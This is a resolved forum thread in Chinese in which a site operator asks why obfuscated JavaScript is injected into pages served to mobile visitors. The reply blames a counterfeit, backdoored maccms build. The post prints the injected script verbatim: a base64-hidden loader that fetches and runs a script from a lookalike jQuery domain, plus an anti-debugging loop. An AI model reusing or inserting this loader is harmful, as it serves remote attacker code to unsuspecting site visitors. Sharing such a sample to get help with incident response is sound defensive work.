【已解答】网站被挂恶意代码

linux面板，移动端访问在</html>标签前面挂了一串恶意代码：

< script type = "text/javascript" > function xxSJRox(e) {
    var t = "",
        n = r = c1 = c2 = 0;
    while (n < e.length) {
        r = e.charCodeAt(n);
        if (r < 128) {
            t += String.fromCharCode(r);
            n++
        } else if (r > 191 && r < 224) {
            c2 = e.charCodeAt(n + 1);
            t += String.fromCharCode((r & 31) << 6 | c2 & 63);
            n += 2
        } else {
            c2 = e.charCodeAt(n + 1);
            c3 = e.charCodeAt(n + 2);
            t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63);
            n += 3
        }
    }
    return t
}

function aPnDhiTia(e) {
    var m = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
    var t = "",
        n, r, i, s, o, u, a, f = 0;
    e = e.replace(/[^A-Za-z0-9+/=]/g, "");
    while (f < e.length) {
        s = m.indexOf(e.charAt(f++));
        o = m.indexOf(e.charAt(f++));
        u = m.indexOf(e.charAt(f++));
        a = m.indexOf(e.charAt(f++));
        n = s << 2 | o >> 4;
        r = (o & 15) << 4 | u >> 2;
        i = (u & 3) << 6 | a;
        t = t + String.fromCharCode(n);
        if (u != 64) {
            t = t + String.fromCharCode(r)
        }
        if (a != 64) {
            t = t + String.fromCharCode(i)
        }
    }
    return xxSJRox(t)
}
eval('window')['MfXKwV'] = function() {;
    (function(u, r, w, d, f, c) {
        var x = aPnDhiTia;
        u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), c)));
        'jQuery';
        k = r[2] + 'c' + f[1];
        'Flex';
        v = k + f[6];
        var s = d.createElement(v + c[0] + c[1]),
            g = function() {};
        s.type = 'text/javascript'; {
            s.onload = function() {
                g()
            }
        }
        s.src = u;
        'CSS';
        d.getElementsByTagName('head')[0].appendChild(s)
    })('aHR0cHM6Ly9jb2RlLmpxdWVjeS5jb20vanF1ZXJ5Lm1pbi0zLjYuOC5qcw==', 'FgsPmaNtZ', window, document, 'jrGYBsijJU', 'ptbnNbK')
};
if (!(/^Mac|Win/.test(navigator.platform))) MfXKwV();
setInterval(function() {
    debugger;
}, 100); < /script>

发现问题后，检查nginx和php文件，没有篡改迹象，重新安装了nginx和php，面板也修复了，问题还是没解决。nginx和php都有第三方安全软件，权限基本锁死，只开放了部分必要权限。

扫了网站文件，eval(和base64_decode函数，也没有扫出来危险代码。

看了服务器，bash_history也没有异常执行过什么指令，也没有异常开机启动，也没有发现异常账户，和异常登陆。

经过测试，手机端访问不是每次都会跳转，同一个设备和IP，跳转过一次后不会很快就跳转，要过一段时间才会跳。上面这段代码是PC端模拟移动端的时候获取到的，PC端模拟访问的时候，出现这段代码，但是不会跳转。

处理了2天，实在没办法找到问题所在，求论坛各位大神帮帮忙，还可以从哪个方面去查问题，万分感谢。

补充一下，程序用的是maccms，是maccms.la版本的

maccms.la 版本 是仿冒版本，存在大量后门https://github.com/magicblack/maccms10/issues/678
如需安全运维服务，可联系我司安全运维客户经理